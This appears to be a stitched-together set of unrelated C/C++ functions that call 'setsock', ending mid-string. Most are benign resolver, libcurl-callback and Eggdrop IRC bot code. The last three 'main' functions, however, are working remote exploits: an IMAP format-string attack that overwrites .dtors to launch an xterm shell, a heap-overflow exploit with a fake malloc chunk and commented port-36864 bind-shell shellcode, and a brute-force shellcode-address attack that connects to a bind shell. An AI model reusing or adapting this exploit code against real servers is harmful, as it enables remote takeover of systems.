void resolv_conf::reload_cb (ref<bool> d, bool failure, str newres) { if (*d) return; nbump = 0; reload_lock = false; last_reload = timenow; if (!newres) { warn ("resolv_conf::reload_cb: fork: %m\n"); setsock (true); return; } if (newres.len () != sizeof (_res)) { warn ("resolv_conf::reload_cb: short read\n"); setsock (true); return; } char oldnsaddr[sizeof (_res.nsaddr_list)]; memcpy (oldnsaddr, _res.nsaddr_list, sizeof (oldnsaddr)); memcpy (&_res, newres, sizeof (_res)); if (memcmp (oldnsaddr, _res.nsaddr_list, sizeof (oldnsaddr))) { warn ("reloaded DNS configuration (resolv.conf)\n"); ns_idx = _res.nscount ? _res.nscount - 1 : 0; //nbump = 0; last_reload = timenow; setsock (true); } else setsock (failure); }
void resolver::pktready (bool tcp, u_char *qb, ssize_t n) { if (n <= 0) { if (tcp) { tcpsock = NULL; if (!last_resp) setsock (true); last_resp = 0; resend (false, true); } else { udpsock = NULL; setsock (true); } return; } nbump = 0; last_resp = timenow; dnsparse reply (qb, n); question q; if (!reply.qparse (&q) || q.q_class != C_IN) return; dnsreq *r; for (r = reqtab[reply.hdr->id]; r && (r->usetcp != tcp || r->type != q.q_type || strcasecmp (r->name, q.q_name)); r = reqtab.nextkeq (r)) ; if (!r) return; if (reply.error && !r->error) r->error = reply.error; if (r->error == NXDOMAIN) { r->error = 0; r->start (true); } else if (!r->error && !r->usetcp && reply.hdr->tc) { reqtoq.remove (r); r->usetcp = true; r->xmit (0); } else r->readreply (r->error ? NULL : &reply); }
void resolver::udpcheck_cb (ptr<hostent> h, int err) { udpcheck_req = NULL; if (err == ARERR_TIMEOUT) setsock (true); }
/* Initialize a new SockInfo structure */ static void addsock(curl_socket_t s, CURL *easy, int action, GlobalInfo *g) { SockInfo *fdp = calloc(sizeof(SockInfo), 1); fdp->global = g; setsock(fdp, s, easy, action, g); curl_multi_assign(g->multi, s, fdp); }
/* CURLMOPT_SOCKETFUNCTION */ static int sock_cb(CURL *e, curl_socket_t s, int what, void *cbp, void *sockp) { std::cout << std::endl << __PRETTY_FUNCTION__ << " called" << std::endl; fprintf(MSG_OUT, "\nsock_cb: socket=%d, what=%d, sockp=%p", s, what, sockp); GlobalInfo *g = (GlobalInfo*) cbp; int *actionp = (int *) sockp; const char *whatstr[] = { "none", "IN", "OUT", "INOUT", "REMOVE" }; fprintf(MSG_OUT, "\nsocket callback: s=%d e=%p what=%s ", s, e, whatstr[what]); if (what == CURL_POLL_REMOVE) { fprintf(MSG_OUT, "\n"); remsock(actionp, g); } else { if (!actionp) { fprintf(MSG_OUT, "\nAdding data: %s", whatstr[what]); addsock(s, e, what, g); } else { fprintf(MSG_OUT, "\nChanging action from %s to %s", whatstr[*actionp], whatstr[what]); setsock(actionp, s, e, what, *actionp, g); } } return 0; }
/* CURLMOPT_SOCKETFUNCTION */ static int sock_cb(CURL *e, curl_socket_t s, int what, void *cbp, void *sockp) { GlobalInfo *g = (GlobalInfo*) cbp; SockInfo *fdp = (SockInfo*) sockp; static const char *whatstr[]={ "none", "IN", "OUT", "INOUT", "REMOVE" }; MSG_OUT("socket callback: s=%d e=%p what=%s ", s, e, whatstr[what]); if (what == CURL_POLL_REMOVE) { MSG_OUT("\n"); remsock(fdp); } else { if (!fdp) { MSG_OUT("Adding data: %s%s\n", what&CURL_POLL_IN?"READ":"", what&CURL_POLL_OUT?"WRITE":"" ); addsock(s, e, what, g); } else { MSG_OUT( "Changing action from %d to %d\n", fdp->action, what); setsock(fdp, s, e, what, g); } } return 0; }
static void addsock(curl_socket_t s, CURL *easy, int action, GlobalInfo *g) { int *fdp = (int *)calloc(sizeof(int), 1); /* fdp is used to store current action */ setsock(fdp, s, easy, action, g); curl_multi_assign(g->multi, s, fdp); }
/* CURLMOPT_SOCKETFUNCTION */ int sock_cb(CURL *e, curl_socket_t s, int what, void *cbp, void *sockp) { struct http_m_global *g = (struct http_m_global*) cbp; struct http_m_cell *cell = (struct http_m_cell*)sockp; const char *whatstr[]={ "none", "IN", "OUT", "INOUT", "REMOVE" }; LM_DBG("socket callback: s=%d e=%p what=%s\n", s, e, whatstr[what]); if (what == CURL_POLL_REMOVE) { /* if cell is NULL the handle has been removed by the event callback for timeout */ if (cell) { if (cell->evset && cell->ev) { LM_DBG("freeing event %p\n", cell->ev); event_del(cell->ev); event_free(cell->ev); cell->ev=NULL; cell->evset=0; } } else { LM_DBG("REMOVE action without cell, handler timed out.\n"); } } else { if (!cell) { LM_DBG("Adding data: %s\n", whatstr[what]); addsock(s, e, what, g); } else { LM_DBG("Changing action from %s to %s\n", whatstr[cell->action], whatstr[what]); setsock(cell, s, e, what); } } return 0; }
/* CURLMOPT_SOCKETFUNCTION */ static int sock_cb(CURL *e, curl_socket_t s, int what, void *cbp, void *sockp) { GlobalInfo *g = (GlobalInfo*) cbp; SockInfo *fdp = (SockInfo*) sockp; const char *whatstr[]={ "none", "IN", "OUT", "INOUT", "REMOVE" }; fprintf(MSG_OUT, "socket callback: s=%d e=%p what=%s ", s, e, whatstr[what]); if (what == CURL_POLL_REMOVE) { fprintf(MSG_OUT, "\n"); remsock(fdp); } else { if (!fdp) { fprintf(MSG_OUT, "Adding data: %s\n", whatstr[what]); addsock(s, e, what, g); } else { fprintf(MSG_OUT, "Changing action from %s to %s\n", whatstr[fdp->action], whatstr[what]); setsock(fdp, s, e, what, g); } } return 0; }
/* Notifies about updates on a socket file descriptor */ static int sock_cb(CURL *handle, curl_socket_t curl_soc, int what, void *cbp, void *sockp) { orcout(orcm_debug, "%s handle %p curl_soc %i what %i cbp %p sockp %p\n", __PRETTY_FUNCTION__, handle, curl_soc, what, cbp, sockp); global_info *global = (global_info *)cbp; sock_info *soc = (sock_info *)sockp; const char *whatstr[] = { "none", "IN", "OUT", "INOUT", "REMOVE" }; orcout(orcm_debug, "socket callback: s=%d e=%p what=%s ", curl_soc, handle, whatstr[what]); if (what == CURL_POLL_REMOVE) { orcout(orcm_debug, "\n"); remsock(soc, global); } else { if (!soc) { orcout(orcm_debug, "Adding data: %s\n", whatstr[what]); addsock(curl_soc, handle, what, global); } else { orcout(orcm_debug, "Changing action from %s to %s\n", whatstr[soc->action], whatstr[what]); setsock(soc, curl_soc, handle, what, global); } } return 0; }
/* CURLMOPT_SOCKETFUNCTION */ int sock_cb(CURL *e, curl_socket_t s, int what, Context* c, int* actionp) { TRACE("sock_cb"); setsock(s, e, what, c); return 0; }
static void addsock(curl_socket_t s, CURL *easy, int action, GlobalInfo *g) { std::cout << std::endl << __PRETTY_FUNCTION__ << " called" << std::endl; /* fdp is used to store current action */ int *fdp = (int *) calloc(sizeof(int), 1); setsock(fdp, s, easy, action, 0, g); curl_multi_assign(g->multi, s, fdp); }
void setsock(curl_socket_t s, CURL*e, int act, Context* c) { boost::asio::ip::tcp::socket* tcp_socket; tcp_socket = c->socket_map_.find(s); if (!tcp_socket) return; setsock(tcp_socket, e, act, c); }
/* Initialize a new SockInfo structure */ static void addsock(curl_socket_t s, CURL *easy, int action, GlobalInfo *g) { SockInfo *fdp = g_malloc0(sizeof(SockInfo)); fdp->global = g; fdp->ch=g_io_channel_unix_new(s); setsock(fdp, s, easy, action, g); curl_multi_assign(g->multi, s, fdp); }
int getsock(int options) { int sock = socket(AF_INET, SOCK_STREAM, 0); if (sock < 0) fatal("Can't open a socket at all!", 0); setsock(sock, options); return sock; }
/* Initialize a new SockInfo structure */ static void addsock(curl_socket_t curl_soc, CURL *handle, int action, global_info *global) { sock_info *soc = calloc(sizeof(sock_info), 1); soc->global = global; setsock(soc, curl_soc, handle, action, global); curl_multi_assign(global->multi, curl_soc, soc); }
void resolver::sendreq (dnsreq *r) { if (!udpsock) { setsock (false); return; } ptr<dnssock> sock; if (!r->usetcp) sock = udpsock; else if (!tcpsock && !tcpinit ()) { setsock (true); return; } else sock = tcpsock; u_char qb[QBSIZE]; int n; n = res_mkquery (QUERY, r->name, C_IN, r->type, NULL, 0, NULL, qb, sizeof (qb)); //warn ("query (%s, %d): %d\n", r->name.cstr (), r->type, n); if (n < 0) { r->fail (ARERR_REQINVAL); return; } HEADER *const h = (HEADER *) qb; h->id = r->id; h->rd = 1; /* FreeBSD (and possibly other OSes) have a broken dn_expand * function that doesn't properly invert dn_comp. */ { dnsparse query (qb, n, false); question q; if (query.qparse (&q)) r->name = q.q_name; } sock->sendpkt (qb, n); }
static void addsock( curl_socket_t sockfd, int action, struct tr_web * g ) { struct tr_web_sockinfo * f = tr_new0( struct tr_web_sockinfo, 1 ); dbgmsg( "creating a sockinfo %p for fd %d", f, sockfd ); setsock( sockfd, action, g, f ); curl_multi_assign( g->multi, sockfd, f ); }
/* assign a socket to the multi handler */ void addsock(curl_socket_t s, CURL *easy, int action, struct http_m_global *g) { struct http_m_cell *cell; cell = http_m_cell_lookup(easy); if (!cell) return; setsock(cell, s, cell->easy, action); curl_multi_assign(g->multi, s, cell); }
int getsock(int options) { int sock = socket(AF_INET, SOCK_STREAM, 0); if (sock >= 0) setsock(sock, options); else putlog(LOG_MISC, "*", "Warning: Can't create new socket!"); return sock; }
int main(int argc,char *argv[]){ int sflag=DF_SFLAG; unsigned long do_system_addr=DO_SYSTEM; unsigned long retloc=DTOR_END_ADDR; unsigned long shaddr=SHELL; char host[256]=DEF_STR; int port=PORT; extern char *optarg; int sock,i,r=0; char buf[1024]; char user[256]=DEF_STR; char pass[256]=DEF_STR; char *ptr=NULL; char xhost_ip_buf[256]=XHOST_IP; get_10_ip(xhost_ip_buf); memset((char *)buf,0,sizeof(buf)); memset((char *)user,0,sizeof(user)); memset((char *)pass,0,sizeof(pass)); (void)banrl(); while((sock=getopt(argc,argv,"R:r:D:d:H:h:P:p:F:f:I:i:U:u:S:s:"))!=EOF){ switch(sock){ case 'R': case 'r': retloc=strtoul(optarg,NULL,0); break; case 'D': case 'd': do_system_addr=strtoul(optarg,NULL,0); break; case 'H': case 'h': memset((char *)host,0,sizeof(host)); strncpy(host,optarg,sizeof(host)-1); break; case 'P': case 'p': port=atoi(optarg); break; case 'F': case 'f': sflag=atoi(optarg); break; case 'I': case 'i': memset((char *)xhost_ip_buf,0,sizeof(xhost_ip_buf)); strncpy(xhost_ip_buf,optarg,sizeof(xhost_ip_buf)-1); get_10_ip(xhost_ip_buf); break; case 'U': case 'u': memset((char *)user,0,sizeof(user)); strncpy(user,optarg,sizeof(user)-1); break; case 'S': case 's': memset((char *)pass,0,sizeof(pass)); strncpy(pass,optarg,sizeof(pass)-1); break; case '?': default: (void)usage(argv[0]); break; } } if(!strcmp(host,DEF_STR)||!strcmp(user,DEF_STR)||!strcmp(pass,DEF_STR)){ (void)usage(argv[0]); } fprintf(stdout," [+] make socket.\n"); fprintf(stdout," [+] host: %s.\n",host); fprintf(stdout," [+] port: %d.\n",port); sock=setsock(host,port); re_connt(sock); recv(sock,buf,sizeof(buf)-1,0); if(strstr(buf,"IMAP4rev1")){ fprintf(stdout," [+] OK, IMAP4rev1.\n"); } else { fprintf(stdout," [-] Ooops, no match.\n\n"); close(sock); exit(-1); } memset((char *)buf,0,sizeof(buf)); snprintf(buf,sizeof(buf)-1,"1 login \"%s\" \"%s\"\n",user,pass); send(sock,buf,strlen(buf),0); memset((char *)buf,0,sizeof(buf)); while(recv(sock,buf,sizeof(buf)-1,0)){ if(strstr(buf," Completed")){ fprintf(stdout," [+] login completed.\n"); break; } else if(strstr(buf," rejected")){ fprintf(stdout," [-] login failed.\n\n"); exit(-1); } } memset((char *)buf,0,sizeof(buf)); snprintf(buf,sizeof(buf)-1,"1 select \"inbox\"\n"); send(sock,buf,strlen(buf),0); memset((char *)buf,0,sizeof(buf)); while(recv(sock,buf,sizeof(buf)-1,0)){ if(strstr(buf," Completed")){ fprintf(stdout," [+] select success.\n"); break; } else if(strstr(buf," NO SELECT")){ fprintf(stdout," [-] select failed.\n\n"); exit(-1); } } /* get, do_system address */ fprintf(stdout," [+] find do_system address.\n"); memset((char *)buf,0,sizeof(buf)); snprintf(buf,sizeof(buf)-1,"1 search topic |%%%d$x|\n",GET_DO_SYSTEM_SFLAG); send(sock,buf,strlen(buf),0); memset((char *)buf,0,sizeof(buf)); recv(sock,buf,sizeof(buf)-1,0); if(strstr(buf,"|")){ ptr=(char *)strstr(buf,"|"); sscanf(ptr,"|%x|\n",&do_system_addr); } do_system_addr-=DEF_DO_SYSTEM_OFFSET; fprintf(stdout," [+] make exploit code.\n"); fprintf(stdout," [+] retloc address: %p.\n",retloc); fprintf(stdout," [+] do_system address: %p.\n",do_system_addr); fprintf(stdout," [+] send exploit code.\n"); send_exploit_code(sock,retloc,do_system_addr,sflag); for(i=0,r=4;i<(sizeof(xterm_shell)/4);i++,r+=2){ send_exploit_code(sock,retloc+r,xterm_shell[i],sflag); } #define LOGOUT_CMD "1 logout\n" send(sock,LOGOUT_CMD,strlen(LOGOUT_CMD),0); sleep(1); recv(sock,buf,sizeof(buf)-1,0); close(sock); if(strstr(buf,"BYE")&&strstr(buf,"LOGOUT")){ fprintf(stdout," [+] logout success.\n\n"); } else { fprintf(stdout," [-] logout failed.\n\n"); exit(-1); } exit(0); }
int main(int argc, char **argv) { int xx, i; #ifdef STOP_UAC int nvpair[2]; #endif char buf[520], s[25]; FILE *f; #ifndef ENABLE_STRIP struct rlimit cdlim; #endif /* Don't allow Eggdrop to run as root. */ if (((int) getuid() == 0) || ((int) geteuid() == 0)) fatal("ERROR: Eggdrop will not run as root!", 0); #ifndef ENABLE_STRIP cdlim.rlim_cur = RLIM_INFINITY; cdlim.rlim_max = RLIM_INFINITY; setrlimit(RLIMIT_CORE, &cdlim); #endif #include "patch.h" /* Version info! */ egg_snprintf(ver, sizeof ver, "eggdrop v%s", egg_version); egg_snprintf(version, sizeof version, "Eggdrop v%s (C) 1997 Robey Pointer (C) 2005 Eggheads", egg_version); /* Now add on the patchlevel (for Tcl) */ sprintf(&egg_version[strlen(egg_version)], " %u", egg_numver); strcat(egg_version, egg_xtra); #ifdef STOP_UAC nvpair[0] = SSIN_UACPROC; nvpair[1] = UAC_NOPRINT; setsysinfo(SSI_NVPAIRS, (char *) nvpair, 1, NULL, 0); #endif /* Set up error / signal traps. */ setup_signal_traps(); /* Initialize a few variables before main loop. */ cache_miss = 0; cache_hit = 0; chanset = NULL; now = time(NULL); egg_memcpy(&nowtm, localtime(&now), sizeof(struct tm)); lastmin = nowtm.tm_min; /* Initialize random number generator. */ srandom((unsigned int) (now % (getpid() + getppid()))); init_mem(); init_language(1); /* Process command line arguments. */ process_args(argc, argv); printf("\n%s\n", version); init_dcc_max(); init_userent(); logfile_init(0); init_bots(); init_net(); init_modules(); if (backgrd) bg_prepare_split(); init_tcl(argc, argv); init_language(0); help_init(); traffic_init(); logfile_init(1); #ifdef STATIC link_statics(); #endif strncpyz(s, ctime(&now), sizeof s); strcpy(&s[11], &s[20]); putlog(LOG_ALL, "*", "--- Loading %s (%s)", ver, s); /* Read configuration data. */ readconfig(); /* Check for encryption module. */ if (!encrypt_pass) { printf(MOD_NOCRYPT); bg_send_quit(BG_ABORT); exit(1); } putlog(LOG_MISC, "*", "=== %s: %d channels, %d users.", botnetnick, count_channels(), count_users(userlist)); if (!pid_file[0]) egg_snprintf(pid_file, sizeof pid_file, "pid.%s", botnetnick); /* Check for pre-existing eggdrop! */ f = fopen(pid_file, "r"); if (f != NULL) { fgets(s, 10, f); xx = atoi(s); kill(xx, SIGCHLD); /* Meaningless kill to determine if PID is used. */ if (errno != ESRCH) { printf(EGG_RUNNING1, botnetnick); printf(EGG_RUNNING2, pid_file); bg_send_quit(BG_ABORT); exit(1); } } /* Move into background? */ if (backgrd) { #ifndef CYGWIN_HACKS bg_do_split(); } else { #endif xx = getpid(); if (xx != 0) { FILE *fp; /* Write PID to file. */ unlink(pid_file); fp = fopen(pid_file, "w"); if (fp != NULL) { fprintf(fp, "%u\n", xx); if (fflush(fp)) { /* Let the bot live since this doesn't appear to be a botchk. */ printf("Cannot not write to '%s' (PID file).\n", pid_file); fclose(fp); unlink(pid_file); } else fclose(fp); } else printf("Cannot not write to '%s' (PID file).\n", pid_file); #ifdef CYGWIN_HACKS printf("Launched into the background (PID: %d)\n\n", xx); #endif } } use_stderr = 0; /* Stop writing to stderr now */ if (backgrd) { /* Ok, try to disassociate from controlling terminal (finger cross) */ #if defined(HAVE_SETPGID) && !defined(CYGWIN_HACKS) setpgid(0, 0); #endif /* Tcl wants the stdin, stdout and stderr file handles kept open. */ freopen("/dev/null", "r", stdin); freopen("/dev/null", "w", stdout); freopen("/dev/null", "w", stderr); #ifdef CYGWIN_HACKS FreeConsole(); #endif } /* Terminal emulating dcc chat */ if (!backgrd && term_z) { int n = new_dcc(&DCC_CHAT, sizeof(struct chat_info)); dcc[n].addr = iptolong(getmyip()); dcc[n].sock = STDOUT; dcc[n].timeval = now; dcc[n].u.chat->con_flags = conmask; dcc[n].u.chat->strip_flags = STRIP_ALL; dcc[n].status = STAT_ECHO; strcpy(dcc[n].nick, "HQ"); strcpy(dcc[n].host, "llama@console"); /* HACK: Workaround not to pass literal "HQ" as a non-const arg */ dcc[n].user = get_user_by_handle(userlist, dcc[n].nick); /* Make sure there's an innocuous HQ user if needed */ if (!dcc[n].user) { userlist = adduser(userlist, dcc[n].nick, "none", "-", USER_PARTY); dcc[n].user = get_user_by_handle(userlist, dcc[n].nick); } setsock(STDOUT, 0); /* Entry in net table */ dprintf(n, "\n### ENTERING DCC CHAT SIMULATION ###\n\n"); dcc_chatter(n); } then = now; online_since = now; autolink_cycle(NULL); /* Hurry and connect to tandem bots. */ add_help_reference("cmds1.help"); add_help_reference("cmds2.help"); add_help_reference("core.help"); /* Create hooks. */ add_hook(HOOK_SECONDLY, (Function) core_secondly); add_hook(HOOK_MINUTELY, (Function) core_minutely); add_hook(HOOK_HOURLY, (Function) core_hourly); add_hook(HOOK_REHASH, (Function) event_rehash); add_hook(HOOK_PRE_REHASH, (Function) event_prerehash); add_hook(HOOK_USERFILE, (Function) event_save); add_hook(HOOK_BACKUP, (Function) backupuserfile); add_hook(HOOK_DAILY, (Function) event_logfile); add_hook(HOOK_DAILY, (Function) traffic_reset); add_hook(HOOK_LOADED, (Function) event_loaded); call_hook(HOOK_LOADED); debug0("main: entering loop"); while (1) { int socket_cleanup = 0; #ifdef USE_TCL_EVENTS /* Process a single Tcl event. */ Tcl_DoOneEvent(TCL_ALL_EVENTS | TCL_DONT_WAIT); #endif now = time(NULL); random(); /* Every second... */ if (now != then) { call_hook(HOOK_SECONDLY); then = now; } /* Only do this every so often. */ if (!socket_cleanup) { socket_cleanup = 5; /* Remove dead dcc entries. */ dcc_remove_lost(); /* Check for server or dcc activity. */ dequeue_sockets(); } else { socket_cleanup--; } /* Free unused structures. */ garbage_collect(); xx = sockgets(buf, &i); if (xx >= 0) { /* Non-error */ int idx; for (idx = 0; idx < dcc_total; idx++) { if (dcc[idx].sock != xx) continue; if (dcc[idx].type && dcc[idx].type->activity) { traffic_update_in(dcc[idx].type, (strlen(buf) + 1)); /* Traffic stats. */ dcc[idx].type->activity(idx, buf, i); } else { putlog(LOG_MISC, "*", "!!! untrapped dcc activity: type %s, sock %d", dcc[idx].type->name, dcc[idx].sock); } break; } } else if (xx == -1) { /* EOF */ int idx; if (i == STDOUT && !backgrd) fatal("END OF FILE ON TERMINAL", 0); for (idx = 0; idx < dcc_total; idx++) { if (dcc[idx].sock != i) continue; if (dcc[idx].type && dcc[idx].type->eof) { dcc[idx].type->eof(idx); } else { putlog(LOG_MISC, "*", "*** ATTENTION: DEAD SOCKET (%d) OF TYPE %s UNTRAPPED", i, dcc[idx].type ? dcc[idx].type->name : "*UNKNOWN*"); killsock(i); lostdcc(idx); } idx = dcc_total + 1; } if (idx == dcc_total) { putlog(LOG_MISC, "*", "(@) EOF socket %d, not a dcc socket, not anything.", i); close(i); killsock(i); } } else if (xx == -2 && errno != EINTR) { /* select() error */ putlog(LOG_MISC, "*", "* Socket error #%d; recovering.", errno); for (i = 0; i < dcc_total; i++) { if ((fcntl(dcc[i].sock, F_GETFD, 0) == -1) && (errno == EBADF)) { putlog(LOG_MISC, "*", "DCC socket %d (type %d, name '%s') expired -- pfft", dcc[i].sock, dcc[i].type, dcc[i].nick); killsock(dcc[i].sock); lostdcc(i); i--; } } } else if (xx == -3) { call_hook(HOOK_IDLE); socket_cleanup = 0; /* If we've been idle, cleanup & flush */ } if (do_restart) { if (do_restart == -2) { rehash(); } else { int f = 1; module_entry *p; Function startfunc; char name[256]; check_tcl_event("prerestart"); /* Unload as many modules as possible */ while (f) { f = 0; for (p = module_list; p != NULL; p = p->next) { dependancy *d = dependancy_list; int ok = 1; while (ok && d) { if (d->needed == p) ok = 0; d = d->next; } if (ok) { strcpy(name, p->name); if (module_unload(name, botnetnick) == NULL) { f = 1; break; } } } } /* Make sure we don't have any modules left hanging around other than * "eggdrop" and the two that are supposed to be. */ for (f = 0, p = module_list; p; p = p->next) { if (strcmp(p->name, "eggdrop") && strcmp(p->name, "encryption") && strcmp(p->name, "uptime")) { f++; } } if (f != 0) { putlog(LOG_MISC, "*", MOD_STAGNANT); } /* Flush log files to disk. */ flushlogs(); /* Clean up Tcl stuff. */ kill_tcl(); /* Initialize stuff again. */ init_tcl(argc, argv); init_language(0); help_init(); traffic_init(); logfile_init(1); /* This resets our modules which we didn't unload (encryption and uptime). */ for (p = module_list; p; p = p->next) { if (p->funcs) { startfunc = p->funcs[MODCALL_START]; startfunc(NULL); } } rehash(); restart_chons(); call_hook(HOOK_LOADED); } do_restart = 0; } } }
int main(int argc,char *argv[]) { int at_sock; int ts_sock; int port=PORT; int roup; char ttatk_code[36864]; char hostname[0x82]=HOST; char main_str[] = /* BIND SHELL ON PORT TCP/36864 */ //------------------- main: -------------------// "\xeb\x72" /* jmp callz */ //------------------- start: ------------------// "\x5e" /* popl %esi */ //------------------ socket() -----------------// "\x29\xc0" /* subl %eax, %eax */ "\x89\x46\x10" /* movl %eax, 0x10(%esi) */ "\x40" /* incl %eax */ "\x89\xc3" /* movl %eax, %ebx */ "\x89\x46\x0c" /* movl %eax, 0x0c(%esi) */ "\x40" /* incl %eax */ "\x89\x46\x08" /* movl %eax, 0x08(%esi) */ "\x8d\x4e\x08" /* leal 0x08(%esi), %ecx */ "\xb0\x66" /* movb $0x66, %al */ "\xcd\x80" /* int $0x80 */ //------------------- bind() ------------------// "\x43" /* incl %ebx */ "\xc6\x46\x10\x10" /* movb $0x10, 0x10(%esi) */ "\x66\x89\x5e\x14" /* movw %bx, 0x14(%esi) */ "\x88\x46\x08" /* movb %al, 0x08(%esi) */ "\x29\xc0" /* subl %eax, %eax */ "\x89\xc2" /* movl %eax, %edx */ "\x89\x46\x18" /* movl %eax, 0x18(%esi) */ "\xb0\x90" /* movb $0x90, %al */ "\x66\x89\x46\x16" /* movw %ax, 0x16(%esi) */ "\x8d\x4e\x14" /* leal 0x14(%esi), %ecx */ "\x89\x4e\x0c" /* movl %ecx, 0x0c(%esi) */ "\x8d\x4e\x08" /* leal 0x08(%esi), %ecx */ "\xb0\x66" /* movb $0x66, %al */ "\xcd\x80" /* int $0x80 */ //------------------ listen() -----------------// "\x89\x5e\x0c" /* movl %ebx, 0x0c(%esi) */ "\x43" /* incl %ebx */ "\x43" /* incl %ebx */ "\xb0\x66" /* movb $0x66, %al */ "\xcd\x80" /* int $0x80 */ //------------------ accept() -----------------// "\x89\x56\x0c" /* movl %edx, 0x0c(%esi) */ "\x89\x56\x10" /* movl %edx, 0x10(%esi) */ "\xb0\x66" /* movb $0x66, %al */ "\x43" /* incl %ebx */ "\xcd\x80" /* int $0x80 */ //---- dup2(s, 0), dup2(s, 1), dup2(s, 2) -----// "\x86\xc3" /* xchgb %al, %bl */ "\xb0\x3f" /* movb $0x3f, %al */ "\x29\xc9" /* subl %ecx, %ecx */ "\xcd\x80" /* int $0x80 */ "\xb0\x3f" /* movb $0x3f, %al */ "\x41" /* incl %ecx */ "\xcd\x80" /* int $0x80 */ "\xb0\x3f" /* movb $0x3f, %al */ "\x41" /* incl %ecx */ "\xcd\x80" /* int $0x80 */ //------------------ execve() -----------------// "\x88\x56\x07" /* movb %dl, 0x07(%esi) */ "\x89\x76\x0c" /* movl %esi, 0x0c(%esi) */ "\x87\xf3" /* xchgl %esi, %ebx */ "\x8d\x4b\x0c" /* leal 0x0c(%ebx), %ecx */ "\xb0\x0b" /* movb $0x0b, %al */ "\xcd\x80" /* int $0x80 */ //------------------- callz: ------------------// "\xe8\x89\xff\xff\xff" /* call start */ "/bin/sh"; /* 128byte */ #define plus_4str(x0x) x0x+=4 int x0x_num=0; int x0x_size=0; #define BUF_LEN 1024 char *debug_test; char code_128len[BUF_LEN]; char x82_16x0x[]={ /* 16byte */ 0x82,0x82,0x82,0x82,0x82, 0x82,0x82,0x82,0x82,0x82, 0x82,0x82,0x82,0x82,0x82, 0x82 }; char nop_n_jump[4]={0x41,0xeb,0x0c,0x42}; int nop_12jump=0; int ok_cont=0; int target_type_number=0; char p_rev_size[4]={0xff,0xff,0xff,0xfc}; /* chunk size */ char size_fd[4]={0xff,0xff,0xff,0xff}; /* data section size */ char atk_chunk[BUF_LEN]; unsigned long retloc=pl_form[target_type_number].retloc; unsigned long retaddr=pl_form[target_type_number].retaddr;//.stkaddr; memset(ttatk_code,0x00,36864); memset(atk_chunk,0x00,BUF_LEN); memset(code_128len,0x00,BUF_LEN); (void)banrl(argv[0]); while((roup=getopt(argc,argv,"R:r:S:s:H:h:P:p:"))!=EOF) { switch(roup) { case 'R': case 'r': retloc=strtoul(optarg,NULL,0); break; case 'S': case 's': retaddr=strtoul(optarg,NULL,0); break; case 'H': case 'h': memset(hostname,0x00,0x82); strncpy(hostname,optarg,0x82); break; case 'P': case 'p': port=atoi(optarg); break; case '?': (void)usage(argv[0]); break; } } //--- make fake chunk ---// fprintf(stdout," [1] Make fake chunk.\n"); for(x0x_num=0;x0x_num<strlen(x82_16x0x);x0x_num++) atk_chunk[x0x_num]=x82_16x0x[x0x_num]; *(long*)&atk_chunk[x0x_num]=0xfffffffc; // prev_size plus_4str(x0x_num); *(long*)&atk_chunk[x0x_num]=0xffffffff; // size(P) plus_4str(x0x_num); *(long*)&atk_chunk[x0x_num]=retloc-0x0c; // Forward pointer plus_4str(x0x_num); *(long*)&atk_chunk[x0x_num]=retaddr; // Back pointer plus_4str(x0x_num); //--- make code ---// fprintf(stdout," [2] Make shellcode.\n"); for(nop_12jump=0;nop_12jump<0x190;plus_4str(nop_12jump)) *(long*)&code_128len[nop_12jump]=0x41eb0c42; for(x0x_num=0,ok_cont=nop_12jump;x0x_num<strlen(main_str);x0x_num++) code_128len[ok_cont++]=main_str[x0x_num]; //--- fake chunk + 0x20 + (nop + 12byte jmpcode + nop + shellcode) ---// snprintf(ttatk_code,36864, "%s%s%s\r\n",atk_chunk,"\x20",code_128len); fprintf(stdout," [3] Send exploit (bindshell) code.\n"); { // Try two times connections. It's Point. :-) /* 1 */ at_sock=setsock(hostname,port); re_conenter(at_sock); send(at_sock,ttatk_code,strlen(ttatk_code),0); close(at_sock); /* 2 */ at_sock=setsock(hostname,port); re_conenter(at_sock); send(at_sock,ttatk_code,strlen(ttatk_code),0); } fprintf(stdout," [4] Waiting, executes the shell !\n"); sleep(3); fprintf(stdout," [5] Trying %s:36864 ...\n",hostname); /* 3 */ ts_sock=setsock(hostname,36864); re_conenter(ts_sock); fprintf(stdout," [6] Connected to %s:36864 !\n\n",hostname); // Execute bash shell getshell(ts_sock); }
int main(int argc,char *argv[]) { int sock,whtl,type=0,brute_f=0; char tg_host[0x82]="localhost"; u_long shell=plat[type].shell; (void)banrl(); if(argc<2) { (void)usage(argv[0]); } while((whtl=getopt(argc,argv,"H:h:S:s:T:t:IiB:b"))!=-1) { extern char *optarg; switch(whtl) { case 'H': case 'h': memset((char *)tg_host,0,sizeof(tg_host)); strncpy(tg_host,optarg,sizeof(tg_host)-1); break; case 'S': case 's': shell=strtoul(optarg,0,0); break; case 'T': case 't': if((type=atoi(optarg))>1) { (void)usage(argv[0]); } else shell=plat[type].shell; break; case 'I': case 'i': (void)usage(argv[0]); break; case 'B': case 'b': brute_f++; break; case '?': fprintf(stderr," Try `%s -i' for more information.\n\n",argv[0]); exit(-1); break; } } if(brute_f) { fprintf(stdout," **\n ** OK, It's good selection, Attack tries %d times.\n",BRUTE_AT); fprintf(stdout," ** If work process is boring, drink coffee and wait. hehe ;-D\n **\n\n"); fprintf(stdout," [*] Brute-Force mode:\n\n"); fprintf(stdout," |----+----+----+----+----+----+----+----+----+----+----+----+----|"); fprintf(stdout,"\n |"); for(brute_f=0;brute_f<BRUTE_AT;brute_f++) { fflush(stdout); fprintf(stdout,"="); shell+=(0x100); sock=(int)setsock(tg_host,ATK_PORT); if((int)re_connt(sock,0)==-1) { while(!(brute_f>=BRUTE_AT-1)) { fprintf(stdout,"="); brute_f++; } fprintf(stdout,"|\n\n"); fprintf(stderr," [-] Connect Failed.\n\n"); exit(-1); } __atk_code_send_recv(sock,shell); close(sock); sleep(2); sock=(int)setsock(tg_host,SH_PORT); if((int)re_connt(sock,0)==-1) { continue; } while(!(brute_f>=BRUTE_AT-1)) { fprintf(stdout,"="); brute_f++; } fprintf(stdout,"|\n\n"); fprintf(stdout," [+] Shellcode address: %p\n",shell); fprintf(stdout," [*] Brute-Force end !!\n\n"); fprintf(stdout," **\n ** Bind shellcode is port 10000.\n"); fprintf(stdout," ** If bindshell port number was changed, change connection port.\n **\n\n"); (void)send_recv_sh(sock); } fprintf(stdout,"|\n\n **\n"); fprintf(stdout," ** Brute-Force exploit failed. Reason is simple.\n **\n"); fprintf(stdout," ** Could not search shellcode's position during %d times.\n",BRUTE_AT); fprintf(stdout," ** Or, Operating System's target that we attack isn't.\n"); fprintf(stdout," ** OOops ! is 